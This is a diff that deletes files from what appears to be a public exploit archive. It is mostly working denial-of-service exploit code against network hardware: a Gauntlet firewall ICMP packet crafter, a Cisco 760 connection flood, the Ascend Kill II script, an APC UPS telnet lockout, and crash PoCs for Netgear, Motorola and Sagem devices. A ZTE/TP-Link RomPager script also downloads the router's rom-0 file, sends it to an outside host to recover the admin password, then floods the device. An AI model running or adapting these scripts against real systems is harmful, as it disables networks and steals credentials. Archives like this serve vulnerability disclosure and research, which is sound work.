Send money to :-) - * aka Mike Frantzen <- Reply to - * - * Network Associates: "Who's watching your network?" - * MSG.net "Who's watching the watchers?" - * - * This can be found online at http://www.msg.net/firewalls/tis/bland.c - * - * Description: - * If you know an IP that will be routed through a Gauntlet 5.0 Firewall, - * you can remotely lock up the firewall (tested against Solaris 2.6 and - * BSDI). It locks up to the point that one packet will disable STOP-A - * (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI - * (Ctrl-Alt-Del still prompts Y/N but it never reboots). - * - * **You can NOT send this to the Gauntlet's IP. The packet must be one - * **that would go through the forwarding code. - * - * If you are on local ether to the firewall, set it as your default route - * or otherwise send the packet to the firewall's MAC. - * - * The packet is parsed before the packet filtering rules in Gauntlet. So - * the only known work-around is to ACL out ICMP type 12 at your screening - * router. - * Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to - * be vulnerable -- but 5.5 introduces some new 'issues'. - * - * - * Technical Description of the packet: - * The packet is an ICMP Paramater Problem packet that encapsulates an IP - * packet with IP Options. There is a random protocol in the encapsulated - * IP packet. The trick is: the inner packet MUST have IP Options. Some - * options work, some don't. - * The firewall apparently is looking for the packet (or an entry in its - * transparency table) that matches the encapsulated packet. It just keeps - * looking.... It likely has interrupts masked off on Solaris. - * - * - * You need libnet to link this against. It's a pretty spiffy lib. - * http://www.infonexus.com/~daemon9/Projects/Libnet - * http://www.packetfactory.net/libnet - * - * - * For da script kiddies: - * Compile with 'gcc -o bland bland.c -lnet' - * ./bland -d - * (Did you remember to install Libnet???) - * - * - * If it doesn't compile on your machine: I DON'T CARE!!! This program was - * a quick and dirty hack. You try reading a hexdump of a packet off the - * wire and writing something that can reproduce it. - * I know it compiles and works from FreeBSD 3.1 - * - * - * Network Associates (TIS) was notified two weeks ago and they are working - * on a patch. - * - * - * Plugs: - * ISIC -- Program I used (and wrote) to find bugs in Gauntlet's IP stack. - * http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz - * Libnet -- Was able to write the basic exploit in 20 minutes because of - * libnet. See libnet link above. Thanks go out to Route! - * - * - * Credits: - * Mike Frantzen Hey, thats me! - * Mike Scher - * Kevin Kadow <- Gauntlet Random Seed Hole - * Lenard Lynch - * Viki Navratilova - */ - -#include - -int main(int argc, char **argv) -{ - u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0; - u_long *problem = NULL; - u_char *packet = NULL; - int sock, c, len = 0; - long acx, count = 1; - struct icmp *icmp; - struct ip *ip; - - /* It appears that most IP options of length >0 will work - * Works with 128, 64, 32, 16... And the normal ones 137... - * Does not work with 0, 1 */ - u_char data[] = {137}; - int data_len = sizeof(data); - - printf("Written by Mike Frantzen... \n"); - printf("For test purposes only... yada yada yada...\n"); - - src_ip = inet_addr("10.10.10.10"); - - while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) { - switch(c) { - case 'd': dst_ip = libnet_name_resolve(optarg, 1); - break; - case 's': src_ip = libnet_name_resolve(optarg, 1); - break; - case 'D': ins_dst_ip = name_resolve(optarg, 1); - break; - case 'S': ins_src_ip = name_resolve(optarg, 1); - break; - case 'l': data_len = atoi(optarg); - break; - case 'c': if ( (count = atol(optarg)) < 1) - count = 1; - break; - default: printf("Don't understand option.\n"); - exit(-1); - } - } - - if ( dst_ip == 0 ) { - printf("Usage: %s\t -d \t[-s ]\n", - rindex(argv[0], '/') == NULL ? argv[0] - : rindex(argv[0], '/') + 1); - printf("\t\t[-S ]\t[-D ]\n"); - printf("\t\t[-l ]\t[-c <# to send>]\n"); - exit(-1); - } - - if ( ins_dst_ip == 0 ) - ins_dst_ip = src_ip; - if ( ins_src_ip == 0 ) - ins_src_ip = dst_ip; - - if ( (packet = malloc(1500)) == NULL ) { - perror("malloc: "); - exit(-1); - } - if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) { - perror("socket: "); - exit(-1); - } - - /* 8 is the length of the ICMP header with the problem field */ - len = 8 + IP_H + data_len; - bzero(packet + IP_H, len); - - libnet_build_ip(len, /* Size of the payload */ - 0xc2, /* IP tos */ - 30241, /* IP ID */ - 0, /* Frag Offset & Flags */ - 64, /* TTL */ - IPPROTO_ICMP, /* Transport protocol */ - src_ip, /* Source IP */ - dst_ip, /* Destination IP */ - NULL, /* Pointer to payload */ - 0, - packet); /* Packet memory */ - - - /* ICMP Header for Parameter Problem - * --------------+---------------+---------------+--------------- - *| Type (12) | Code (0) | Checksum | - * --------------+---------------+---------------+--------------- - *| Pointer | unused | - * --------------+---------------+---------------+--------------- - * Internet Header + 64 bits of original datagram data.... - */ - - icmp = (struct icmp *) (packet + IP_H); - problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */ - icmp->icmp_type = ICMP_PARAMPROB; - icmp->icmp_code = 0; /* Indicates a problem pointer */ - *problem = htonl(0x14000000); /* Problem is 20 bytes into it */ - - - /* Need to embed an IP packet within the ICMP */ - ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */ - ip->ip_v = 0x4; /* IPV4 */ - ip->ip_hl = 0xf; /* Some IP Options */ - ip->ip_tos = 0xa3; /* Whatever */ - ip->ip_len = htons(data_len); /* Length of packet */ - ip->ip_id = 30241; /* Whatever */ - ip->ip_off = 0; /* No frag's */ - ip->ip_ttl = 32; /* Whatever */ - ip->ip_p = 98; /* Random protocol */ - ip->ip_sum = 0; /* Will calc later */ - ip->ip_src.s_addr = ins_src_ip; - ip->ip_dst.s_addr = ins_dst_ip; - - /* Move our data block into the packet */ - bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len); - - /* I hate checksuming. Spent a day trying to get it to work in - * perl... That sucked... Tequilla would have helped immensly. - */ - libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len); - - /* Bah... See above comment.... */ - libnet_do_checksum(packet, IPPROTO_ICMP, len); - - - printf("Sending %li packets", count); - for (acx = 0; acx < count; acx++) { - if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H)) - perror("write_ip: "); - else printf("."); - } - printf("\n\n"); - return( 0 ); -} - diff --git a/platforms/hardware/remote/19513.txt b/platforms/hardware/remote/19513.txt deleted file mode 100755 index caf8fdac6..000000000 --- a/platforms/hardware/remote/19513.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/665/info - -A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock up the modem requiring a hard reset. - -The vulnerability manifests itself when a remote users connects to the Diva HTTP port and sends a GET request of the form 'login.html?password='. - -Enter the URL 'http://diva/login.htm?password=0123456789012345678901234567890123456789' into your browser, where 'diva' is the IP address of the modem. \ No newline at end of file diff --git a/platforms/hardware/remote/19919.c b/platforms/hardware/remote/19919.c deleted file mode 100755 index 1074613ef..000000000 --- a/platforms/hardware/remote/19919.c +++ /dev/null @@ -1,237 +0,0 @@ -source: http://www.securityfocus.com/bid/1211/info - -Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack. - -/* Cisco 760 Series Connection Overflow - * - * - * Written by: Tiz.Telesup - * Affected Systems: Routers Cisco 760 Series, I havn't tested anymore - * Tested on: FreeBSD 4.0 and Linux RedHat 6.0 - */ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -int net_connect (struct sockaddr_in *cs, char *server, - unsigned short int port, char *sourceip, - unsigned short int sourceport, int sec); - - -void net_write (int fd, const char *str, ...); - - -unsigned long int net_resolve (char *host); - - - - -void -usage (void) -{ - printf ("usage: ./cisco host times\n"); - exit (EXIT_FAILURE); -} - - -int -main (int argc, char *argv[]) -{ - - - char host[256]; - int port,times,count,sd = 0; - int m = 0; - struct sockaddr_in cs; - - - printf ("Cisco 760 series Connection Overflow.\n"); - printf ("-------------------------------------\n"); - - if (argc < 3) - usage(); - - strcpy (host, argv[1]); - times=atoi (argv[2]); - - if ((times < 1) || (times > 10000)) /*Maximum number of connections*/ - usage(); - - - - port =23; /* This might be changed to the telnet port of the router*/ - - - - printf ("Host: %s Times: %d\n", host, times); - for (count=0;countsin_family = AF_INET; - cs->sin_port = htons (port); - - - fd = socket (cs->sin_family, SOCK_STREAM, 0); - if (fd == -1) - return (-1); - - - if (!(cs->sin_addr.s_addr = net_resolve (server))) { - close (fd); - return (-1); - } - - - flags = fcntl (fd, F_GETFL, 0); - if (flags == -1) { - close (fd); - return (-1); - } - n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); - if (n == -1) { - close (fd); - return (-1); - } - - - error = 0; - - - n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); - if (n < 0) { - if (errno != EINPROGRESS) { - close (fd); - return (-1); - } - } - if (n == 0) - goto done; - - - FD_ZERO(&rset); - FD_ZERO(&wset); - FD_SET(fd, &rset); - FD_SET(fd, &wset); - tv.tv_sec = sec; - tv.tv_usec = 0; - - - n = select(fd + 1, &rset, &wset, NULL, &tv); - if (n == 0) { - close(fd); - errno = ETIMEDOUT; - return (-1); - } - if (n == -1) - return (-1); - - - if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { - if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { - len = sizeof(error); - if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { - errno = ETIMEDOUT; - return (-1); - } - if (error == 0) { - goto done; - } else { - errno = error; - return (-1); - } - } - } else - return (-1); - - -done: - n = fcntl(fd, F_SETFL, flags); - if (n == -1) - return (-1); - return (fd); -} - - -unsigned long int -net_resolve (char *host) -{ - long i; - struct hostent *he; - - - i = inet_addr(host); - if (i == -1) { - he = gethostbyname(host); - if (he == NULL) { - return (0); - } else { - return (*(unsigned long *) he->h_addr); - } - } - return (i); -} - - -void -net_write (int fd, const char *str, ...) -{ - char tmp[8192]; - va_list vl; - int i; - - - va_start(vl, str); - memset(tmp, 0, sizeof(tmp)); - i = vsnprintf(tmp, sizeof(tmp), str, vl); - va_end(vl); - - - send(fd, tmp, i, 0); - return; -} \ No newline at end of file diff --git a/platforms/hardware/remote/19923.txt b/platforms/hardware/remote/19923.txt deleted file mode 100755 index a39d6c4c6..000000000 --- a/platforms/hardware/remote/19923.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/1219/info - -Large usernames or passwords sent to the router's HTTP interface restart the router. Router log will show "restart not in response to admin command" - -Open the router interface with your browser. -Username: ......................... (x79 +) -After the router restarts, you can hit refresh on your browser to take it down again. - -A simple script or program could be written to keep the router down indefinately. \ No newline at end of file diff --git a/platforms/hardware/remote/20090.txt b/platforms/hardware/remote/20090.txt deleted file mode 100755 index 451b3cc64..000000000 --- a/platforms/hardware/remote/20090.txt +++ /dev/null @@ -1,6 +0,0 @@ -source: http://www.securityfocus.com/bid/1491/info - -HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality. - -ftp -quote AAAAAAAAAAA \ No newline at end of file diff --git a/platforms/hardware/remote/20323.txt b/platforms/hardware/remote/20323.txt deleted file mode 100755 index b4d1248ef..000000000 --- a/platforms/hardware/remote/20323.txt +++ /dev/null @@ -1,18 +0,0 @@ -source: http://www.securityfocus.com/bid/1838/info - - -Cisco devices running IOS software may be prone to a denial of service attack if a URL containing a question mark followed by a slash (?/) is requested. The device will enter an infinite loop when supplied with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be required in order to regain normal functionality. - -This vulnerability is restricted to devices that do not have the enable password set or if the password is known or can be easily predicted. The vulnerable service is only on by default in the Cisco 1003, 1004 and 1005 routers. - -Users can identify vulnerable or invulnerable devices running IOS by logging onto the device and issuing the ?show version? command. If IOS is running on a vulnerable device the command will return ?Internetwork Operating System Software? or ?IOS (tm)? with a version number. - -Vulnerable IOS software may be found on the following Cisco devices: - -*Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000 series. -*Recent versions of LS1010 ATM switch. -*Catalyst 6000 with IOS. -*Catalyst 2900XL LAN switch with IOS. -*Cisco DistributedDirector. - -http://target/anytext?/ \ No newline at end of file diff --git a/platforms/hardware/remote/20332.pl b/platforms/hardware/remote/20332.pl deleted file mode 100755 index 0d968df1c..000000000 --- a/platforms/hardware/remote/20332.pl +++ /dev/null @@ -1,64 +0,0 @@ -source: http://www.securityfocus.com/bid/1855/info - -A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. - -Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable. - -#!/usr/bin/perl - - # - # Ascend Kill II - perl version - # (C) 1998 Rootshell - http://www.rootshell.com/ - - # - # Released: 3/17/98 - # - # Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues - # (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) - # - # NOTE: This program is NOT to be used for malicous purposes. This is - # intenteded for educational purposes only. By using this program - # you agree to use this for lawfull purposes ONLY. - # - # - - use Socket; - - require "getopts.pl"; - - sub AF_INET {2;} - sub SOCK_DGRAM {2;} - - sub ascend_kill { - $remotehost = shift(@_); - chop($hostname = `hostname`); - $port = 9; - $SIG{'INT'} = 'dokill'; - $sockaddr = 'S n a4 x8'; - ($pname, $aliases, $proto) = getprotobyname('tcp'); - ($pname, $aliases, $port) = getservbyname($port, 'tcp') - unless $port =~ /^\d+$/; - ($pname, $aliases, $ptype, $len, $thisaddr) = - gethostbyname($hostname); - $this = pack($sockaddr, AF_INET, 0, $thisaddr); - ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost); - $that = pack($sockaddr, AF_INET, $port, $thataddr); - socket(S, &AF_INET, &SOCK_DGRAM, 0); - $msg = pack("c64", - 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, - 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, - 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, - 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, - 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, - 0x50, 0x41, 0x53, 0x53); - for ($i=0; $i<500; $i++) { - $msg .= pack("c1", 0xff); - } - send(S,$msg,0,$that) || die "send:$!"; - } - - if ($ARGV[0] eq '') { - print "usage: akill2.pl \n"; - exit; - } - - &ascend_kill($ARGV[0]); \ No newline at end of file diff --git a/platforms/hardware/remote/20654.pl b/platforms/hardware/remote/20654.pl deleted file mode 100755 index a8903dc4f..000000000 --- a/platforms/hardware/remote/20654.pl +++ /dev/null @@ -1,49 +0,0 @@ -source: http://www.securityfocus.com/bid/2430/info - -Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP. - -A problem with the network software used with the Symmetra can allow a denial of service to the system, thus preventing administrative access. This problem is due to the handling of the telnet protocol by the firmware of the power supply. The system does not support more than one telnet session at a time, and when it encounters three failed login attempts, discontinues access for a configurable period between 1 and 10 minutes. - -Therefore, it is possible for a malicious user to launch an remote attack against the telnet service of the power supply, and prevent administrative access to the power supply for the duration of the attack. This vulnerability may affect other APC UPS products as well. - -#!/usr/bin/perl -#altomo@nudehackers.com -#apc management card dos - -$user = "blacksun"; -$time = "$ARGV[1]"; - -use IO::Socket; -$ip = "$ARGV[0]"; -$port = "23"; -if ($#ARGV<0) { -print " useage: $0 \n"; -exit(); -} -$socket = IO::Socket::INET->new( -Proto=>"tcp", -PeerAddr=>$ip, -PeerPort=>$port,); - - -print "Apc management card DoS\n"; -print "altomo\@nudehackers.com\n"; - - -sub dos() { -print "DoS started will attack every $time seconds\n"; -print "Ctrl+C to exit\n"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print $socket "$user\r"; -print "\n"; -close $socket; -sleep($time); -&dos; - -} -&dos; -#hong kong danger duo diff --git a/platforms/hardware/remote/20734.sh b/platforms/hardware/remote/20734.sh deleted file mode 100755 index 645519dc1..000000000 --- a/platforms/hardware/remote/20734.sh +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/2551/info - -PIX is an enterprise firewall engineered and maintained by Cisco Systems. It is designed to provide robust features and multiple methods of access control and filtering. - -A problem with the PIX could allow a denial of service. PIX firewalls using TACACS+ are vulnerable to a resource starvation attack which results in a denial of service. Upon receiving multiple requests for TACACS+ authentication from an unauthorized user, the firewalls resources can be exhausted. This causes the firewall to crash, requiring power cycling to resume regular service. - -This makes it possible for a user from either the public or private side of the PIX to crash the firewall, and deny service to legitimate users. - -All PIX Firewalls having configuration lines beginning with the following line are affected: -pixfirewall# aaa authentication - -Any configurations not including aaa authentication are not affected. - -while (true); do (wget http://external.system 2>/dev/null &); done \ No newline at end of file diff --git a/platforms/hardware/remote/33737.py b/platforms/hardware/remote/33737.py deleted file mode 100755 index 970ec81a9..000000000 --- a/platforms/hardware/remote/33737.py +++ /dev/null @@ -1,363 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -# Exploit Title: ZTE and TP-Link RomPager DoS Exploit -# Date: 10-05-2014 -# Server Version: RomPager/4.07 UPnP/1.0 -# Tested Routers: ZTE ZXV10 W300 -# TP-Link TD-W8901G -# TP-Link TD-W8101G -# TP-Link TD-8840G -# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0 -# Tested on: Kali Linux x86 -# -# Notes: Please note this exploit may contain errors, and -# is provided "as it is". There is no guarantee -# that it will work on your target router(s), as -# the code may have to be adapted. -# This is to avoid script kiddie abuse as well. -# -# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. -# Author takes no responsibility for any kind of damage you cause. -# -# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) -# -# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/ -# Video: https://www.youtube.com/watch?v=1fSECo2ewoo -# Dedicate to Nick Knight and Hood3dRob1n -# -# ./dos.py -i 192.168.1.1 - -import os -import re -import sys -import time -import urllib -import base64 -import httplib -import urllib2 -import requests -import optparse -import telnetlib -import subprocess -import collections -import unicodedata - -class BitReader: - - def __init__(self, bytes): - self._bits = collections.deque() - - for byte in bytes: - byte = ord(byte) - for n in xrange(8): - self._bits.append(bool((byte >> (7-n)) & 1)) - - def getBit(self): - return self._bits.popleft() - - def getBits(self, num): - res = 0 - for i in xrange(num): - res += self.getBit() << num-1-i - return res - - def getByte(self): - return self.getBits(8) - - def __len__(self): - return len(self._bits) - -class RingList: - - def __init__(self, length): - self.__data__ = collections.deque() - self.__full__ = False - self.__max__ = length - - def append(self, x): - if self.__full__: - self.__data__.popleft() - self.__data__.append(x) - if self.size() == self.__max__: - self.__full__ = True - - def get(self): - return self.__data__ - - def size(self): - return len(self.__data__) - - def maxsize(self): - return self.__max__ - - def __getitem__(self, n): - if n >= self.size(): - return None - return self.__data__[n] - -def filter_non_printable(str): - return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9]) - - -def banner(): - return ''' - -\t\t _/_/_/ _/_/_/ -\t\t _/ _/ _/_/ _/ -\t\t _/ _/ _/ _/ _/_/ -\t\t _/ _/ _/ _/ _/ -\t\t_/_/_/ _/_/ _/_/_/ - - ''' -def dos(host, password): - while (1): - url = 'http://' +host+ '/Forms/tools_test_1' - parameters = { - 'Test_PVC' : 'PVC0', - 'PingIPAddr' : '\101'*2000, - 'pingflag' : '1', - 'trace_open_flag' : '0', - 'InfoDisplay' : '+-+Info+-%0D%0A' - } - - params = urllib.urlencode(parameters) - - req = urllib2.Request(url, params) - base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '') - req.add_header("Authorization", "Basic %s" %base64string) - req.add_header("Content-type", "application/x-www-form-urlencoded") - req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm") - try: - print '[~] Sending Payload' - response = urllib2.urlopen(req, timeout=1) - sys.exit(0) - - except: - flag = checkHost(host) - if flag == 0: - print '[+] The host is still up and running' - else: - print '[~] Success! The host is down' - sys.exit(0) - break - -def checkHost(host): - if sys.platform == 'win32': - c = "ping -n 2 " + host - else: - c = "ping -c 2 " + host - - try: - x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) - time.sleep(1) - return x - - except: - pass - -def checkServer(host): - connexion = httplib.HTTPConnection(host) - connexion.request("GET", "/status.html") - response = connexion.getresponse() - server = response.getheader("server") - connexion.close() - time.sleep(2) - if server == 'RomPager/4.07 UPnP/1.0': - return 0 - else: - return 1 - -def checkPassword(host): - print '[+] Checking for default password' - defaultpass = 'admin' - tn = telnetlib.Telnet(host, 23, 4) - tn.read_until("Password: ") - tn.write(defaultpass + '\n') - time.sleep(2) - banner = tn.read_eager() - banner = regex(len(defaultpass)*r'.'+'\w+' , banner) - tn.write("exit\n") - tn.close() - time.sleep(4) - if banner == 'Copyright': - print '[+] Default password is being used' - dos(host, defaultpass) - else: - print '[!] Default Password is not being used' - while True: - msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower() - try: - if msg[0] == 'y': - password = decodePasswordLocal(host) - print '[*] Router password is: ' +password - dos(host, password) - break - if msg[0] == 'n': - password = decodePasswordRemote(host) - print '[*] Router password is: ' +password - dos(host, password) - break - else: - print '[!] Enter a valid choice' - except Exception, e: - print e - continue - - -def decodePasswordRemote(host): - fname = 'rom-0' - if os.path.isfile(fname) == True: - os.remove(fname) - urllib.urlretrieve ("http://"+host+"/rom-0", fname) - # If this URL goes down you might have to find one and change this function. - # You can also use the local decoder. It might have few errors in getting output. - url = 'http://198.61.167.113/zynos/decoded.php' # Target URL - files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload - data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include - headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include - - res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False ) - res1 =res.content - p = re.search('rows=10>(.*)', res1) - if p: - passwd = found = p.group(1) - else: - password = 'NotFound' - return passwd - -def decodePasswordLocal(host): - # Sometimes this might output a wrong password while finding the exact string. - # print the result as mentioned below and manually find out - fname = 'rom-0' - if os.path.isfile(fname) == True: - os.remove(fname) - urllib.urlretrieve ("http://"+host+"/rom-0", fname) - fpos=8568 - fend=8788 - fhandle=file('rom-0') - fhandle.seek(fpos) - chunk="*" - amount=221 - while fpos < fend: - if fend-fpos < amount: - amount = amount - data = fhandle.read(amount) - fpos += len(data) - - reader = BitReader(data) - result = '' - - window = RingList(2048) - - while True: - bit = reader.getBit() - if not bit: - char = reader.getByte() - result += chr(char) - window.append(char) - else: - bit = reader.getBit() - if bit: - offset = reader.getBits(7) - if offset == 0: - break - else: - offset = reader.getBits(11) - - lenField = reader.getBits(2) - if lenField < 3: - lenght = lenField + 2 - else: - lenField <<= 2 - lenField += reader.getBits(2) - if lenField < 15: - lenght = (lenField & 0x0f) + 5 - else: - lenCounter = 0 - lenField = reader.getBits(4) - while lenField == 15: - lenField = reader.getBits(4) - lenCounter += 1 - lenght = 15*lenCounter + 8 + lenField - - for i in xrange(lenght): - char = window[-offset] - result += chr(char) - window.append(char) - - result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore') - # In case the password you see is wrong while filtering, manually print it from here and findout. - #print result - if 'TP-LINK' in result: - result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK'; - result = result.replace("TP-LINK", "") - result = result[1:] - - if 'ZTE' in result: - result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE'; - result = result.replace("ZTE", "") - result = result[1:] - - if 'tc160' in result: - result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160'; - result = result.replace("tc160", "") - result = result[1:] - return result - -def regex(path, text): - match = re.search(path, text) - if match: - return match.group() - else: - return None - -def main(): - if sys.platform == 'win32': - os.system('cls') - else: - os.system('clear') - try: - print banner() - print ''' -|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n -[*] Author: Osanda Malith Jayathissa -[*] Follow @OsandaMalith -[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. -[!] Author takes no responsibility for any kind of damage you cause. - - ''' - parser = optparse.OptionParser("usage: %prog -i ") - parser.add_option('-i', dest='host', - type='string', - help='Specify the IP to attack') - (options, args) = parser.parse_args() - - if options.host is None: - parser.print_help() - exit(-1) - - host = options.host - x = checkHost(host) - - if x == 0: - print '[+] The host is up and running' - server = checkServer(host) - if server == 0: - checkPassword(host) - else: - print ('[!] Sorry the router is not running RomPager') - else: - print '[!] The host is not up and running' - sys.exit(0) - - except KeyboardInterrupt: - print '[!] Ctrl + C detected\n[!] Exiting' - sys.exit(0) - except EOFError: - print '[!] Ctrl + D detected\n[!] Exiting' - sys.exit(0) - -if __name__ == "__main__": - main() -#EOF \ No newline at end of file diff --git a/platforms/hardware/webapps/27775.py b/platforms/hardware/webapps/27775.py deleted file mode 100755 index c4ca1754d..000000000 --- a/platforms/hardware/webapps/27775.py +++ /dev/null @@ -1,95 +0,0 @@ -#!/usr/bin/python - -################################################################ -# # -# Netgear ProSafe - CVE-2013-4776 PoC # -# written by Juan J. Guelfo @ Encripto AS # -# post@encripto.no # -# # -# Copyright 2013 Encripto AS. All rights reserved. # -# # -# This software is licensed under the FreeBSD license. # -# http://www.encripto.no/tools/license.php # -# # -################################################################ - -import sys, getopt, urllib2 -from subprocess import * - - -__version__ = "0.1" -__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)" - - -# Prints title and other header info -def header(): - print "" - print " ================================================================= " - print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__) - print "| by {0}\t\t |".format(__author__) - print " ================================================================= " - print "" - - -# Prints help -def help(): - header() - print """ - Usage: python CVE-2013-4776.py [mandatory options] - - Mandatory options: - -t target ...Target IP address - -p port ...Port where the HTTP admin interface is listening on - - Example: - python CVE-2013-4776.py -t 192.168.0.1 -p 80 - """ - sys.exit(0) - - -if __name__ == '__main__': - - #Parse options - try: - options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="]) - - except getopt.GetoptError, err: - header() - print "\n[-] Error: {0}.\n".format(str(err)) - sys.exit(1) - - if not options: - help() - - target = None - port = None - for opt, arg in options: - if opt in ("-t"): - target = arg - - if opt in ("-p"): - port = arg - - #Option input validation - if not target or not port: - help() - print "[-] Error: Incorrect syntax.\n" - sys.exit(1) - - header() - headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" } - - try: - # Get the startup config via HTTP admin interface - print "[+] Triggering DoS condition..." - r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers) - urllib2.urlopen(r,"",5).read() - - except urllib2.URLError: - print "[-] Error: The connection could not be established.\n" - - except: - print "[+] The switch should be freaking out..." - print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n" - - sys.exit(0) diff --git a/platforms/hardware/webapps/30688.py b/platforms/hardware/webapps/30688.py deleted file mode 100755 index bf535c71f..000000000 --- a/platforms/hardware/webapps/30688.py +++ /dev/null @@ -1,33 +0,0 @@ -# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service -# Date: 01/03/14 -# Exploit Author: nicx0 -# Vendor Homepage: http://www.motorola.com/ -# Software Link: http://www.motorola.com/us/SBG6580-SURFboard%C2%AE-eXtreme-Wireless-Cable-Modem/70902.html -# Version: SBG6580-6.5.0.0-GA-00-226-NOSH -# POSTing a bad login page parameter causes the router to reboot. - -import sys -import socket -import urllib2 -import urllib -router_ip = '' -try: - router_ip = str(sys.argv[1]) -except: - print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1' - sys.exit(2) -query_args = {'this_was':'too_easy'} -url = 'http://' + router_ip + '/goform/login' -post_data = urllib.urlencode(query_args) -request = urllib2.Request(url, post_data) -try: - print '[+] Sending invalid POST request to ' + url + '...' - response = urllib2.urlopen(request,timeout=5) -except socket.timeout: - print '[+] Success! No response from the modem.' -except urllib2.HTTPError: - print '[-] Failed: HTTP error received. The modem might not be a SBG6580.' -except urllib2.URLError: - print '[-] Failed: URL error received. Check the IP address again..' -else: - print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.' diff --git a/platforms/hardware/webapps/34172.txt b/platforms/hardware/webapps/34172.txt deleted file mode 100755 index 2d392f3b7..000000000 --- a/platforms/hardware/webapps/34172.txt +++ /dev/null @@ -1,30 +0,0 @@ -# Title : Sagem F@st 3304-V1 denial of service Vulnerability -# Vendor Homepage : http://www.sagemcom.com -# Tested on : Firefox, Google Chrome -# Tested Router : Sagem F@st 3304-V1 -# Date : 2014-07-26 -# Author : Z3ro0ne -# Contact : saadousfar59@gmail.com -# Facebook Page : https://www.facebook.com/Z3ro0ne - -# Vulnerability description : -the Vulnerability allow unauthenticated users to remotely restart and reset the router -# Exploit: - - -SAGEM FAST3304-V1 